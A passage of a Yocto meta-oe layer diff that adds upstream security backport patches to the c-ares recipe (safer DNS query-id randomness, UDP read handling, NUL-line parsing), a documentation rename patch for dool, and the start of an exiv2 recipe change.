a/src/lib/ares_config.h.cmake b/src/lib/ares_config.h.cmake +index fddb785..798820a 100644 +--- a/src/lib/ares_config.h.cmake ++++ b/src/lib/ares_config.h.cmake +@@ -346,6 +346,9 @@ + /* Define to 1 if you need the memory.h header file even with stdlib.h */ + #cmakedefine NEED_MEMORY_H + ++/* Define if have arc4random_buf() */ ++#cmakedefine HAVE_ARC4RANDOM_BUF ++ + /* a suitable file/device to read random data from */ + #cmakedefine CARES_RANDOM_FILE "@CARES_RANDOM_FILE@" + +diff --git a/src/lib/ares_destroy.c b/src/lib/ares_destroy.c +index fed2009..0447af4 100644 +--- a/src/lib/ares_destroy.c ++++ b/src/lib/ares_destroy.c +@@ -90,6 +90,9 @@ void ares_destroy(ares_channel channel) + if (channel->resolvconf_path) + ares_free(channel->resolvconf_path); + ++ if (channel->rand_state) ++ ares__destroy_rand_state(channel->rand_state); ++ + ares_free(channel); + } + +diff --git a/src/lib/ares_init.c b/src/lib/ares_init.c +index de5d86c..2607ed6 100644 +--- a/src/lib/ares_init.c ++++ b/src/lib/ares_init.c +@@ -72,7 +72,6 @@ static int config_nameserver(struct server_state **servers, int *nservers, + static int set_search(ares_channel channel, const char *str); + static int set_options(ares_channel channel, const char *str); + static const char *try_option(const char *p, const char *q, const char *opt); +-static int init_id_key(rc4_key* key,int key_data_len); + + static int config_sortlist(struct apattern **sortlist, int *nsort, + const char *str); +@@ -149,6 +148,7 @@ int ares_init_options(ares_channel *channelptr, struct ares_options *options, + channel->sock_funcs = NULL; + channel->sock_func_cb_data = NULL; + channel->resolvconf_path = NULL; ++ channel->rand_state = NULL; + + channel->last_server = 0; + channel->last_timeout_processed = (time_t)now.tv_sec; +@@ -202,9 +202,13 @@ int ares_init_options(ares_channel *channelptr, struct ares_options *options, + /* Generate random key */ + + if (status == ARES_SUCCESS) { +- status = init_id_key(&channel->id_key, ARES_ID_KEY_LEN); ++ channel->rand_state = ares__init_rand_state(); ++ if (channel->rand_state == NULL) { ++ status = ARES_ENOMEM; ++ } ++ + if (status == ARES_SUCCESS) +- channel->next_id = ares__generate_new_id(&channel->id_key); ++ channel->next_id = ares__generate_new_id(channel->rand_state); + else + DEBUGF(fprintf(stderr, "Error: init_id_key failed: %s\n", + ares_strerror(status))); +@@ -224,6 +228,8 @@ done: + ares_free(channel->lookups); + if(channel->resolvconf_path) + ares_free(channel->resolvconf_path); ++ if (channel->rand_state) ++ ares__destroy_rand_state(channel->rand_state); + ares_free(channel); + return status; + } +@@ -2495,76 +2501,6 @@ static int sortlist_alloc(struct apattern **sortlist, int *nsort, + return 1; + } + +-/* initialize an rc4 key. If possible a cryptographically secure random key +- is generated using a suitable function (for example win32's RtlGenRandom as +- described in +- http://blogs.msdn.com/michael_howard/archive/2005/01/14/353379.aspx +- otherwise the code defaults to cross-platform albeit less secure mechanism +- using rand +-*/ +-static void randomize_key(unsigned char* key,int key_data_len) +-{ +- int randomized = 0; +- int counter=0; +-#ifdef WIN32 +- BOOLEAN res; +- if (ares_fpSystemFunction036) +- { +- res = (*ares_fpSystemFunction036) (key, key_data_len); +- if (res) +- randomized = 1; +- } +-#else /* !WIN32 */ +-#ifdef CARES_RANDOM_FILE +- FILE *f = fopen(CARES_RANDOM_FILE, "rb"); +- if(f) { +- setvbuf(f, NULL, _IONBF, 0); +- counter = aresx_uztosi(fread(key, 1, key_data_len, f)); +- fclose(f); +- } +-#endif +-#endif /* WIN32 */ +- +- if (!randomized) { +- for (;counter<key_data_len;counter++) +- key[counter]=(unsigned char)(rand() % 256); /* LCOV_EXCL_LINE */ +- } +-} +- +-static int init_id_key(rc4_key* key,int key_data_len) +-{ +- unsigned char index1; +- unsigned char index2; +- unsigned char* state; +- short counter; +- unsigned char *key_data_ptr = 0; +- +- key_data_ptr = ares_malloc(key_data_len); +- if (!key_data_ptr) +- return ARES_ENOMEM; +- memset(key_data_ptr, 0, key_data_len); +- +- state = &key->state[0]; +- for(counter = 0; counter < 256; counter++) +- /* unnecessary AND but it keeps some compilers happier */ +- state[counter] = (unsigned char)(counter & 0xff); +- randomize_key(key->state,key_data_len); +- key->x = 0; +- key->y = 0; +- index1 = 0; +- index2 = 0; +- for(counter = 0; counter < 256; counter++) +- { +- index2 = (unsigned char)((key_data_ptr[index1] + state[counter] + +- index2) % 256); +- ARES_SWAP_BYTE(&state[counter], &state[index2]); +- +- index1 = (unsigned char)((index1 + 1) % key_data_len); +- } +- ares_free(key_data_ptr); +- return ARES_SUCCESS; +-} +- + void ares_set_local_ip4(ares_channel channel, unsigned int local_ip) + { + channel->local_ip4 = local_ip; +diff --git a/src/lib/ares_private.h b/src/lib/ares_private.h +index 60d69e0..518b5c3 100644 +--- a/src/lib/ares_private.h ++++ b/src/lib/ares_private.h +@@ -101,8 +101,6 @@ W32_FUNC const char *_w32_GetHostsFile (void); + + #endif + +-#define ARES_ID_KEY_LEN 31 +- + #include "ares_ipv6.h" + #include "ares_llist.h" + +@@ -262,12 +260,8 @@ struct apattern { + unsigned short type; + }; + +-typedef struct rc4_key +-{ +- unsigned char state[256]; +- unsigned char x; +- unsigned char y; +-} rc4_key; ++struct ares_rand_state; ++typedef struct ares_rand_state ares_rand_state; + + struct ares_channeldata { + /* Configuration data */ +@@ -302,8 +296,8 @@ struct ares_channeldata { + + /* ID to use for next query */ + unsigned short next_id; +- /* key to use when generating new ids */ +- rc4_key id_key; ++ /* random state to use when generating new ids */ ++ ares_rand_state *rand_state; + + /* Generation number to use for the next TCP socket open/close */ + int tcp_connection_generation; +@@ -359,7 +353,10 @@ void ares__close_sockets(ares_channel channel, struct server_state *server); + int ares__get_hostent(FILE *fp, int family, struct hostent **host); + int ares__read_line(FILE *fp, char **buf, size_t *bufsize); + void ares__free_query(struct query *query); +-unsigned short ares__generate_new_id(rc4_key* key); ++ ++ares_rand_state *ares__init_rand_state(void); ++void ares__destroy_rand_state(ares_rand_state *state); ++unsigned short ares__generate_new_id(ares_rand_state *state); + struct timeval ares__tvnow(void); + int ares__expand_name_validated(const unsigned char *encoded, + const unsigned char *abuf, +diff --git a/src/lib/ares_query.c b/src/lib/ares_query.c +index 508274d..42323be 100644 +--- a/src/lib/ares_query.c ++++ b/src/lib/ares_query.c +@@ -33,32 +33,6 @@ struct qquery { + + static void qcallback(void *arg, int status, int timeouts, unsigned char *abuf, int alen); + +-static void rc4(rc4_key* key, unsigned char *buffer_ptr, int buffer_len) +-{ +- unsigned char x; +- unsigned char y; +- unsigned char* state; +- unsigned char xorIndex; +- int counter; +- +- x = key->x; +- y = key->y; +- +- state = &key->state[0]; +- for(counter = 0; counter < buffer_len; counter ++) +- { +- x = (unsigned char)((x + 1) % 256); +- y = (unsigned char)((state[x] + y) % 256); +- ARES_SWAP_BYTE(&state[x], &state[y]); +- +- xorIndex = (unsigned char)((state[x] + state[y]) % 256); +- +- buffer_ptr[counter] = (unsigned char)(buffer_ptr[counter]^state[xorIndex]); +- } +- key->x = x; +- key->y = y; +-} +- + static struct query* find_query_by_id(ares_channel channel, unsigned short id) + { + unsigned short qid; +@@ -78,7 +52,6 @@ static struct query* find_query_by_id(ares_channel channel, unsigned short id) + return NULL; + } + +- + /* a unique query id is generated using an rc4 key. Since the id may already + be used by a running query (as infrequent as it may be), a lookup is + performed per id generation. In practice this search should happen only +@@ -89,19 +62,12 @@ static unsigned short generate_unique_id(ares_channel channel) + unsigned short id; + + do { +- id = ares__generate_new_id(&channel->id_key); ++ id = ares__generate_new_id(channel->rand_state); + } while (find_query_by_id(channel, id)); + + return (unsigned short)id; + } + +-unsigned short ares__generate_new_id(rc4_key* key) +-{ +- unsigned short r=0; +- rc4(key, (unsigned char *)&r, sizeof(r)); +- return r; +-} +- + void ares_query(ares_channel channel, const char *name, int dnsclass, + int type, ares_callback callback, void *arg) + { +diff --git a/src/lib/ares_rand.c b/src/lib/ares_rand.c +new file mode 100644 +index 0000000..a564bc2 +--- /dev/null ++++ b/src/lib/ares_rand.c +@@ -0,0 +1,274 @@ ++/* Copyright 1998 by the Massachusetts Institute of Technology. ++ * Copyright (C) 2007-2013 by Daniel Stenberg ++ * ++ * Permission to use, copy, modify, and distribute this ++ * software and its documentation for any purpose and without ++ * fee is hereby granted, provided that the above copyright ++ * notice appear in all copies and that both that copyright ++ * notice and this permission notice appear in supporting ++ * documentation, and that the name of M.I.T. not be used in ++ * advertising or publicity pertaining to distribution of the ++ * software without specific, written prior permission. ++ * M.I.T. makes no representations about the suitability of ++ * this software for any purpose. It is provided "as is" ++ * without express or implied warranty. ++ */ ++ ++#include "ares_setup.h" ++#include "ares.h" ++#include "ares_private.h" ++#include "ares_nowarn.h" ++#include <stdlib.h> ++ ++typedef enum { ++ ARES_RAND_OS = 1, /* OS-provided such as RtlGenRandom or arc4random */ ++ ARES_RAND_FILE = 2, /* OS file-backed random number generator */ ++ ARES_RAND_RC4 = 3 /* Internal RC4 based PRNG */ ++} ares_rand_backend; ++ ++typedef struct ares_rand_rc4 ++{ ++ unsigned char S[256]; ++ size_t i; ++ size_t j; ++} ares_rand_rc4; ++ ++struct ares_rand_state ++{ ++ ares_rand_backend type; ++ union { ++ FILE *rand_file; ++ ares_rand_rc4 rc4; ++ } state; ++}; ++ ++ ++/* Define RtlGenRandom = SystemFunction036. This is in advapi32.dll. There is ++ * no need to dynamically load this, other software used widely does not. ++ * http://blogs.msdn.com/michael_howard/archive/2005/01/14/353379.aspx ++ * https://docs.microsoft.com/en-us/windows/win32/api/ntsecapi/nf-ntsecapi-rtlgenrandom ++ */ ++#ifdef _WIN32 ++BOOLEAN WINAPI SystemFunction036(PVOID RandomBuffer, ULONG RandomBufferLength); ++# ifndef RtlGenRandom ++# define RtlGenRandom(a,b) SystemFunction036(a,b) ++# endif ++#endif ++ ++ ++#define ARES_RC4_KEY_LEN 32 /* 256 bits */ ++ ++static unsigned int ares_u32_from_ptr(void *addr) ++{ ++ if (sizeof(void *) == 8) { ++ return (unsigned int)((((size_t)addr >> 32) & 0xFFFFFFFF) | ((size_t)addr & 0xFFFFFFFF)); ++ } ++ return (unsigned int)((size_t)addr & 0xFFFFFFFF); ++} ++ ++ ++/* initialize an rc4 key as the last possible fallback. */ ++static void ares_rc4_generate_key(ares_rand_rc4 *rc4_state, unsigned char *key, size_t key_len) ++{ ++ size_t i; ++ size_t len = 0; ++ unsigned int data; ++ struct timeval tv; ++ ++ if (key_len != ARES_RC4_KEY_LEN) ++ return; ++ ++ /* Randomness is hard to come by. Maybe the system randomizes heap and stack addresses. ++ * Maybe the current timestamp give us some randomness. ++ * Use rc4_state (heap), &i (stack), and ares__tvnow() ++ */ ++ data = ares_u32_from_ptr(rc4_state); ++ memcpy(key + len, &data, sizeof(data)); ++ len += sizeof(data); ++ ++ data = ares_u32_from_ptr(&i); ++ memcpy(key + len, &data, sizeof(data)); ++ len += sizeof(data); ++ ++ tv = ares__tvnow(); ++ data = (unsigned int)((tv.tv_sec | tv.tv_usec) & 0xFFFFFFFF); ++ memcpy(key + len, &data, sizeof(data)); ++ len += sizeof(data); ++ ++ srand(ares_u32_from_ptr(rc4_state) | ares_u32_from_ptr(&i) | (unsigned int)((tv.tv_sec | tv.tv_usec) & 0xFFFFFFFF)); ++ ++ for (i=len; i<key_len; i++) { ++ key[i]=(unsigned char)(rand() % 256); /* LCOV_EXCL_LINE */ ++ } ++} ++ ++ ++static void ares_rc4_init(ares_rand_rc4 *rc4_state) ++{ ++ unsigned char key[ARES_RC4_KEY_LEN]; ++ size_t i; ++ size_t j; ++ ++ ares_rc4_generate_key(rc4_state, key, sizeof(key)); ++ ++ for (i = 0; i < sizeof(rc4_state->S); i++) { ++ rc4_state->S[i] = i & 0xFF; ++ } ++ ++ for(i = 0, j = 0; i < 256; i++) { ++ j = (j + rc4_state->S[i] + key[i % sizeof(key)]) % 256; ++ ARES_SWAP_BYTE(&rc4_state->S[i], &rc4_state->S[j]); ++ } ++ ++ rc4_state->i = 0; ++ rc4_state->j = 0; ++} ++ ++/* Just outputs the key schedule, no need to XOR with any data since we have none */ ++static void ares_rc4_prng(ares_rand_rc4 *rc4_state, unsigned char *buf, int len) ++{ ++ unsigned char *S = rc4_state->S; ++ size_t i = rc4_state->i; ++ size_t j = rc4_state->j; ++ size_t cnt; ++ ++ for (cnt=0; cnt<len; cnt++) { ++ i = (i + 1) % 256; ++ j = (j + S[i]) % 256; ++ ++ ARES_SWAP_BYTE(&S[i], &S[j]); ++ buf[cnt] = S[(S[i] + S[j]) % 256]; ++ } ++ ++ rc4_state->i = i; ++ rc4_state->j = j; ++} ++ ++ ++static int ares__init_rand_engine(ares_rand_state *state) ++{ ++ memset(state, 0, sizeof(*state)); ++ ++#if defined(HAVE_ARC4RANDOM_BUF) || defined(_WIN32) ++ state->type = ARES_RAND_OS; ++ return 1; ++#elif defined(CARES_RANDOM_FILE) ++ state->type = ARES_RAND_FILE; ++ state->state.rand_file = fopen(CARES_RANDOM_FILE, "rb"); ++ if (state->state.rand_file) { ++ setvbuf(state->state.rand_file, NULL, _IONBF, 0); ++ return 1; ++ } ++ /* Fall-Thru on failure to RC4 */ ++#endif ++ ++ state->type = ARES_RAND_RC4; ++ ares_rc4_init(&state->state.rc4); ++ ++ /* Currently cannot fail */ ++ return 1; ++} ++ ++ ++ares_rand_state *ares__init_rand_state() ++{ ++ ares_rand_state *state = NULL; ++ ++ state = ares_malloc(sizeof(*state)); ++ if (!state) ++ return NULL; ++ ++ if (!ares__init_rand_engine(state)) { ++ ares_free(state); ++ return NULL; ++ } ++ ++ return state; ++} ++ ++ ++static void ares__clear_rand_state(ares_rand_state *state) ++{ ++ if (!state) ++ return; ++ ++ switch (state->type) { ++ case ARES_RAND_OS: ++ break; ++ case ARES_RAND_FILE: ++ fclose(state->state.rand_file); ++ break; ++ case ARES_RAND_RC4: ++ break; ++ } ++} ++ ++ ++static void ares__reinit_rand(ares_rand_state *state) ++{ ++ ares__clear_rand_state(state); ++ ares__init_rand_engine(state); ++} ++ ++ ++void ares__destroy_rand_state(ares_rand_state *state) ++{ ++ if (!state) ++ return; ++ ++ ares__clear_rand_state(state); ++ ares_free(state); ++} ++ ++ ++static void ares__rand_bytes(ares_rand_state *state, unsigned char *buf, size_t len) ++{ ++ ++ while (1) { ++ size_t rv; ++ size_t bytes_read = 0; ++ ++ switch (state->type) { ++ case ARES_RAND_OS: ++#ifdef _WIN32 ++ RtlGenRandom(buf, len); ++ return; ++#elif defined(HAVE_ARC4RANDOM_BUF) ++ arc4random_buf(buf, len); ++ return; ++#else ++ /* Shouldn't be possible to be here */ ++ break; ++#endif ++ ++ case ARES_RAND_FILE: ++ while (1) { ++ size_t rv = fread(buf + bytes_read, 1, len - bytes_read, state->state.rand_file); ++ if (rv == 0) ++ break; /* critical error, will reinit rand state */ ++ ++ bytes_read += rv; ++ if (bytes_read == len) ++ return; ++ } ++ break; ++ ++ case ARES_RAND_RC4: ++ ares_rc4_prng(&state->state.rc4, buf, len); ++ return; ++ } ++ ++ /* If we didn't return before we got here, that means we had a critical rand ++ * failure and need to reinitialized */ ++ ares__reinit_rand(state); ++ } ++} ++ ++unsigned short ares__generate_new_id(ares_rand_state *state) ++{ ++ unsigned short r=0; ++ ++ ares__rand_bytes(state, (unsigned char *)&r, sizeof(r)); ++ return r; ++} ++ +-- +2.30.2 + diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-32067.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-32067.patch new file mode 100644 index 0000000000..f6bcaee534 --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2023-32067.patch @@ -0,0 +1,85 @@ +From b9b8413cfdb70a3f99e1573333b23052d57ec1ae Mon Sep 17 00:00:00 2001 +From: Brad House <brad@brad-house.com> +Date: Mon, 22 May 2023 06:51:49 -0400 +Subject: [PATCH] Merge pull request from GHSA-9g78-jv2r-p7vc + +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/b9b8413cfdb70a3f99e1573333b23052d57ec1ae.patch] +CVE: CVE-2023-32067 +Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com> +--- + src/lib/ares_process.c | 41 +++++++++++++++++++++++++---------------- + 1 file changed, 25 insertions(+), 16 deletions(-) + +diff --git a/src/lib/ares_process.c b/src/lib/ares_process.c +index 87329e3..605e5f8 100644 +--- a/src/lib/ares_process.c ++++ b/src/lib/ares_process.c +@@ -457,7 +457,7 @@ static void read_udp_packets(ares_channel channel, fd_set *read_fds, + { + struct server_state *server; + int i; +- ares_ssize_t count; ++ ares_ssize_t read_len; + unsigned char buf[MAXENDSSZ + 1]; + #ifdef HAVE_RECVFROM + ares_socklen_t fromlen; +@@ -500,32 +500,41 @@ static void read_udp_packets(ares_channel channel, fd_set *read_fds, + /* To reduce event loop overhead, read and process as many + * packets as we can. */ + do { +- if (server->udp_socket == ARES_SOCKET_BAD) +- count = 0; +- +- else { +- if (server->addr.family == AF_INET) ++ if (server->udp_socket == ARES_SOCKET_BAD) { ++ read_len = -1; ++ } else { ++ if (server->addr.family == AF_INET) { + fromlen = sizeof(from.sa4); +- else ++ } else { + fromlen = sizeof(from.sa6); +- count = socket_recvfrom(channel, server->udp_socket, (void *)buf, +- sizeof(buf), 0, &from.sa, &fromlen); ++ } ++ read_len = socket_recvfrom(channel, server->udp_socket, (void *)buf, ++ sizeof(buf), 0, &from.sa, &fromlen); + } + +- if (count == -1 && try_again(SOCKERRNO)) ++ if (read_len == 0) { ++ /* UDP is connectionless, so result code of 0 is a 0-length UDP ++ * packet, and not an indication the connection is closed like on ++ * tcp */ + continue; +- else if (count <= 0) ++ } else if (read_len < 0) { ++ if (try_again(SOCKERRNO)) ++ continue; ++ + handle_error(channel, i, now); ++ + #ifdef HAVE_RECVFROM +- else if (!same_address(&from.sa, &server->addr)) ++ } else if (!same_address(&from.sa, &server->addr)) { + /* The address the response comes from does not match the address we + * sent the request to. Someone may be attempting to perform a cache + * poisoning attack. */ +- break; ++ continue; + #endif +- else +- process_answer(channel, buf, (int)count, i, 0, now); +- } while (count > 0); ++ ++ } else { ++ process_answer(channel, buf, (int)read_len, i, 0, now); ++ } ++ } while (read_len >= 0); + } + } + +-- +2.25.1 + diff --git a/meta-oe/recipes-support/c-ares/c-ares/CVE-2024-25629.patch b/meta-oe/recipes-support/c-ares/c-ares/CVE-2024-25629.patch new file mode 100644 index 0000000000..4c97eda3c7 --- /dev/null +++ b/meta-oe/recipes-support/c-ares/c-ares/CVE-2024-25629.patch @@ -0,0 +1,34 @@ +From: a804c04ddc8245fc8adf0e92368709639125e183 Mon Sep 17 00:00:00 2001 +From: Brad House <brad@brad-house.com> +Date: Mon, 11 Mar 2024 14:29:39 +0000 +Subject: [PATCH] Merge pull request from GHSA-mg26-v6qh-x48q + +CVE: CVE-2024-25629 +Upstream-Status: Backport [https://github.com/c-ares/c-ares/commit/a804c04ddc8245fc8adf0e92368709639125e183] + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + src/lib/ares__read_line.c | 8 ++++++++ + 1 file changed, 8 insertions(+) + +diff --git a/src/lib/ares__read_line.c b/src/lib/ares__read_line.c +index c62ad2a..d6625a3 100644 +--- a/src/lib/ares__read_line.c ++++ b/src/lib/ares__read_line.c +@@ -49,6 +49,14 @@ int ares__read_line(FILE *fp, char **buf, size_t *bufsize) + if (!fgets(*buf + offset, bytestoread, fp)) + return (offset != 0) ? 0 : (ferror(fp)) ? ARES_EFILE : ARES_EOF; + len = offset + strlen(*buf + offset); ++ ++ /* Probably means there was an embedded NULL as the first character in ++ * the line, throw away line */ ++ if (len == 0) { ++ offset = 0; ++ continue; ++ } ++ + if ((*buf)[len - 1] == '\n') + { + (*buf)[len - 1] = 0; +-- +2.40.0 diff --git a/meta-oe/recipes-support/c-ares/c-ares_1.18.1.bb b/meta-oe/recipes-support/c-ares/c-ares_1.18.1.bb index 2cd00cb578..838046146f 100644 --- a/meta-oe/recipes-support/c-ares/c-ares_1.18.1.bb +++ b/meta-oe/recipes-support/c-ares/c-ares_1.18.1.bb @@ -5,7 +5,13 @@ SECTION = "libs" LICENSE = "MIT" LIC_FILES_CHKSUM = "file://LICENSE.md;md5=fb997454c8d62aa6a47f07a8cd48b006" -SRC_URI = "git://github.com/c-ares/c-ares.git;branch=main;protocol=https" +SRC_URI = "git://github.com/c-ares/c-ares.git;branch=main;protocol=https \ + file://CVE-2022-4904.patch \ + file://CVE-2023-31130.patch \ + file://CVE-2023-32067.patch \ + file://CVE-2023-31147.patch \ + file://CVE-2024-25629.patch \ + " SRCREV = "2aa086f822aad5017a6f2061ef656f237a62d0ed" UPSTREAM_CHECK_GITTAGREGEX = "cares-(?P<pver>\d+_(\d_?)+)" @@ -19,3 +25,7 @@ PACKAGES =+ "${PN}-utils" FILES:${PN}-utils = "${bindir}" BBCLASSEXTEND = "native nativesdk" + +# this vulneribility applies only when cross-compiling using autotools +# yocto cross-compiles via cmake which is also listed as official workaround +CVE_CHECK_IGNORE += "CVE-2023-31124" diff --git a/meta-oe/recipes-support/dool/dool/0001-Fix-rename-in-docs.patch b/meta-oe/recipes-support/dool/dool/0001-Fix-rename-in-docs.patch new file mode 100644 index 0000000000..8d576f5d58 --- /dev/null +++ b/meta-oe/recipes-support/dool/dool/0001-Fix-rename-in-docs.patch @@ -0,0 +1,261 @@ +From 689c65fb050976d5a548a5b9a0f5d2c14eaa3301 Mon Sep 17 00:00:00 2001 +From: Alexander Stein <alexander.stein@tq-group.com> +Date: Thu, 8 Dec 2022 14:11:46 +0100 +Subject: [PATCH 1/1] Fix rename in docs + +The content of dool.1.adoc is completly unchanged from dstat.1.adoc. +Unfortunately the 'NAME' specifies the created file name. So +building/cleaning docs is currently broken + +Upstream-Status: Pending +https://github.com/scottchiefbaker/dool/pull/30 + +Signed-off-by: Alexander Stein <alexander.stein@tq-group.com> +--- + docs/dool.1.adoc | 108 +++++++++++++++++++++++------------------------ + 1 file changed, 54 insertions(+), 54 deletions(-) + +diff --git a/docs/dool.1.adoc b/docs/dool.1.adoc +index 24c4a54..921df1f 100644 +--- a/docs/dool.1.adoc ++++ b/docs/dool.1.adoc +@@ -1,35 +1,35 @@ +-= dstat(1) ++= dool(1) + Dag Wieers <dag@wieers.com> + v0.7.3, August 2014 + + + == NAME +-dstat - versatile tool for generating system resource statistics ++dool - versatile tool for generating system resource statistics + + + == SYNOPSIS +-dstat [-afv] [options..] [delay [count]] ++dool [-afv] [options..] [delay [count]] + + + == DESCRIPTION +-Dstat is a versatile replacement for vmstat, iostat and ifstat. Dstat ++Dool is a versatile replacement for vmstat, iostat and ifstat. Dool + overcomes some of the limitations and adds some extra features. + +-Dstat allows you to view all of your system resources instantly, you ++Dool allows you to view all of your system resources instantly, you + can eg. compare disk usage in combination with interrupts from your + IDE controller, or compare the network bandwidth numbers directly with + the disk throughput (in the same interval). + +-Dstat also cleverly gives you the most detailed information in columns ++Dool also cleverly gives you the most detailed information in columns + and clearly indicates in what magnitude and unit the output is displayed. + Less confusion, less mistakes, more efficient. + +-Dstat is unique in letting you aggregate block device throughput for a ++Dool is unique in letting you aggregate block device throughput for a + certain diskset or network bandwidth for a group of interfaces, ie. + you can see the throughput for all the block devices that make up a + single filesystem or storage system. + +-Dstat allows its data to be directly written to a CSV file to be ++Dool allows its data to be directly written to a CSV file to be + imported and used by OpenOffice, Gnumeric or Excel to create graphs. + + [NOTE] +@@ -187,13 +187,13 @@ Possible internal stats are:: + write CSV output to file + + --profile:: +- show profiling statistics when exiting dstat ++ show profiling statistics when exiting dool + + + == PLUGINS +-While anyone can create their own dstat plugins (and contribute them) dstat ++While anyone can create their own dool plugins (and contribute them) dool + ships with a number of plugins already that extend its capabilities greatly. +-Here is an overview of the plugins dstat ships with: ++Here is an overview of the plugins dool ships with: + + --battery:: + battery in percentage (needs ACPI) +@@ -225,17 +225,17 @@ Here is an overview of the plugins dstat ships with: + --disk-wait:: + average time (in milliseconds) for I/O requests issued to the device to be served + +---dstat:: +- show dstat cputime consumption and latency ++--dool:: ++ show dool cputime consumption and latency + +---dstat-cpu:: +- show dstat advanced cpu usage ++--dool-cpu:: ++ show dool advanced cpu usage + +---dstat-ctxt:: +- show dstat context switches ++--dool-ctxt:: ++ show dool context switches + +---dstat-mem:: +- show dstat advanced memory usage ++--dool-mem:: ++ show dool advanced memory usage + + --fan:: + fan speed (needs ACPI) +@@ -250,7 +250,7 @@ Here is an overview of the plugins dstat ships with: + GPFS filesystem operations (needs mmpmon) + + --helloworld:: +- Hello world example dstat plugin ++ Hello world example dool plugin + + --innodb-buffer:: + show innodb buffer stats +@@ -340,22 +340,22 @@ Here is an overview of the plugins dstat ships with: + show sendmail queue size (needs sendmail) + + --snmp-cpu:: +- show CPU stats using SNMP from DSTAT_SNMPSERVER ++ show CPU stats using SNMP from DOOL_SNMPSERVER + + --snmp-load:: +- show load stats using SNMP from DSTAT_SNMPSERVER ++ show load stats using SNMP from DOOL_SNMPSERVER + + --snmp-mem:: +- show memory stats using SNMP from DSTAT_SNMPSERVER ++ show memory stats using SNMP from DOOL_SNMPSERVER + + --snmp-net:: +- show network stats using SNMP from DSTAT_SNMPSERVER ++ show network stats using SNMP from DOOL_SNMPSERVER + + --snmp-net-err: +- show network errors using SNMP from DSTAT_SNMPSERVER ++ show network errors using SNMP from DOOL_SNMPSERVER + + --snmp-sys:: +- show system stats (interrupts and context switches) using SNMP from DSTAT_SNMPSERVER ++ show system stats (interrupts and context switches) using SNMP from DOOL_SNMPSERVER + + --snooze:: + show number of ticks per second +@@ -463,7 +463,7 @@ The default delay is 1 and count is unspecified (unlimited) + + + == INTERMEDIATE UPDATES +-When invoking dstat with a *delay* greater than 1 and without the ++When invoking dool with a *delay* greater than 1 and without the + *--noupdate* option, it will show intermediate updates, ie. the first + time a 1 sec average, the second update a 2 second average, etc. until + the delay has been reached. +@@ -475,34 +475,34 @@ average on a new line, just like with vmstat. + + + == EXAMPLES +-Using dstat to relate disk-throughput with network-usage (eth0), total CPU-usage and system counters: ++Using dool to relate disk-throughput with network-usage (eth0), total CPU-usage and system counters: + ---- +-dstat -dnyc -N eth0 -C total -f 5 ++dool -dnyc -N eth0 -C total -f 5 + ---- + +-Checking dstat's behaviour and the system impact of dstat: ++Checking dool's behaviour and the system impact of dool: + ---- +-dstat -taf --debug ++dool -taf --debug + ---- + + Using the time plugin together with cpu, net, disk, system, load, proc and + top_cpu plugins: + ---- +-dstat -tcndylp --top-cpu ++dool -tcndylp --top-cpu + ---- + this is identical to + ---- +-dstat --time --cpu --net --disk --sys --load --proc --top-cpu ++dool --time --cpu --net --disk --sys --load --proc --top-cpu + ---- + +-Using dstat to relate advanced cpu stats with interrupts per device: ++Using dool to relate advanced cpu stats with interrupts per device: + ---- +-dstat -t --cpu-adv -yif ++dool -t --cpu-adv -yif + ---- + + + == BUGS +-Since it is practically impossible to test dstat on every possible ++Since it is practically impossible to test dool on every possible + permutation of kernel, python or distribution version, I need your + help and your feedback to fix the remaining problems. If you have + improvements or bugreports, please send them to: +@@ -513,40 +513,40 @@ Please see the TODO file for known bugs and future plans. + + + == FILES +-Paths that may contain external dstat_*.py plugins: ++Paths that may contain external dool_*.py plugins: + +- ~/.dstat/ ++ ~/.dool/ + (path of binary)/plugins/ +- /usr/share/dstat/ +- /usr/local/share/dstat/ ++ /usr/share/dool/ ++ /usr/local/share/dool/ + + == ENVIRONMENT VARIABLES + +-Dstat will read additional command line arguments from the environment +-variable *DSTAT_OPTS*. You can use this to configure Dstat's default ++Dool will read additional command line arguments from the environment ++variable *DOOL_OPTS*. You can use this to configure Dool's default + behavior, e.g. if you have a black-on-white terminal: + +- export DSTAT_OPTS="--bw --noupdate" ++ export DOOL_OPTS="--bw --noupdate" + + Other internal or external plugins have their own environment variables + to influence their behavior, e.g. + + +- DSTAT_NTPSERVER ++ DOOL_NTPSERVER + +- DSTAT_MYSQL +- DSTAT_MYSQL_HOST +- DSTAT_MYSQL_PORT +- DSTAT_MYSQL_SOCKET +- DSTAT_MYSQL_USER +- DSTAT_MYSQL_PWD ++ DOOL_MYSQL ++ DOOL_MYSQL_HOST ++ DOOL_MYSQL_PORT ++ DOOL_MYSQL_SOCKET ++ DOOL_MYSQL_USER ++ DOOL_MYSQL_PWD + +- DSTAT_SNMPSERVER +- DSTAT_SNMPCOMMUNITY ++ DOOL_SNMPSERVER ++ DOOL_SNMPCOMMUNITY + +- DSTAT_SQUID_OPTS ++ DOOL_SQUID_OPTS + +- DSTAT_TIMEFMT ++ DOOL_TIMEFMT + + == SEE ALSO + +-- +2.34.1 + diff --git a/meta-oe/recipes-support/dool/dool_1.0.0.bb b/meta-oe/recipes-support/dool/dool_1.0.0.bb index d34397c12a..b70f41cb98 100644 --- a/meta-oe/recipes-support/dool/dool_1.0.0.bb +++ b/meta-oe/recipes-support/dool/dool_1.0.0.bb @@ -11,6 +11,7 @@ DEPENDS += "asciidoc-native xmlto-native" SRC_URI = "git://github.com/scottchiefbaker/dool.git;branch=master;protocol=https \ file://0001-Fix-build-error-as-following.patch \ + file://0001-Fix-rename-in-docs.patch \ " SRCREV = "34a3244b46aa70a31f871a7ca8ffa8d3a7b950d2" diff --git a/meta-oe/recipes-support/exiv2/exiv2_0.27.3.bb b/meta-oe/recipes-support/exiv2/exiv2_0.27.3.bb index 31afe78e45..b210fa6340 100644 --- a/meta-oe/recipes-support/exiv2/exiv2_0.27.3.bb +++ b/meta-oe/recipes-support/exiv2/exiv2_0.27.3.bb @@ -4,7 +4,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=625f055f41728f84a8d7938acc35bdc2" DEPENDS = "zlib expat" -SRC_URI = "https://exiv2.org/releases/${BPN}-${PV}-Source.tar.gz" +SRC_URI = 